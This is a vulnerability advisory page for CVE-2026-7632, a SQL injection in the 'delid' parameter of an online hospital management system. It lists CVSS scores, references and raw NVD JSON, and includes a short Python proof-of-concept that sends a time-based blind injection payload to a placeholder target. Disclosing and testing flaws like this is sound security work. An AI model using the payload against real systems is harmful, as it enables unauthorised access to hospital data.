CVE-2026-7632

Description

A vulnerability was determined in code-projects Online Hospital Management System 1.0. This affects an unknown function of the file /viewappointment.php. This manipulation of the argument delid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Online Hospital Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual target)
target_url = "http://target-ip/path/to/viewappointment.php"

# Injection payload for 'delid' parameter
# Example: Testing for time-based blind SQL injection
payload = "1' AND SLEEP(5)-- -"

# Parameters to be sent
params = {
    "delid": payload
}

try:
    # Sending GET request
    response = requests.get(target_url, params=params, timeout=10)
    
    # Analyzing response time
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerable to SQL Injection: Response delayed.")
    else:
        print("[-] Not vulnerable or patched.")
        
except requests.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7632
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7632
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7632/
[4] VulDB https://vuldb.com/cve/CVE-2026-7632
[5] https://code-projects.org/
[6] https://github.com/Sh1tKing/cve/blob/main/CVE-2026-7632.md
[7] https://github.com/Sh1tKing/cve/blob/main/time-blind-sql.md
[8] https://vuldb.com/submit/806633
[9] https://vuldb.com/vuln/360578
[10] https://vuldb.com/vuln/360578/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7632", "sourceIdentifier": "[email protected]", "published": "2026-05-02T14:16:18.510", "lastModified": "2026-05-05T19:15:06.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Online Hospital Management System 1.0. This affects an unknown function of the file /viewappointment.php. This manipulation of the argument delid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]"}, {"url": "https://github.com/Sh1tKing/cve/blob/main/CVE-2026-7632.md", "source": "[email protected]"}, {"url": "https://github.com/Sh1tKing/cve/blob/main/time-blind-sql.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/806633", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360578", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360578/cti", "source": "[email protected]"}]}}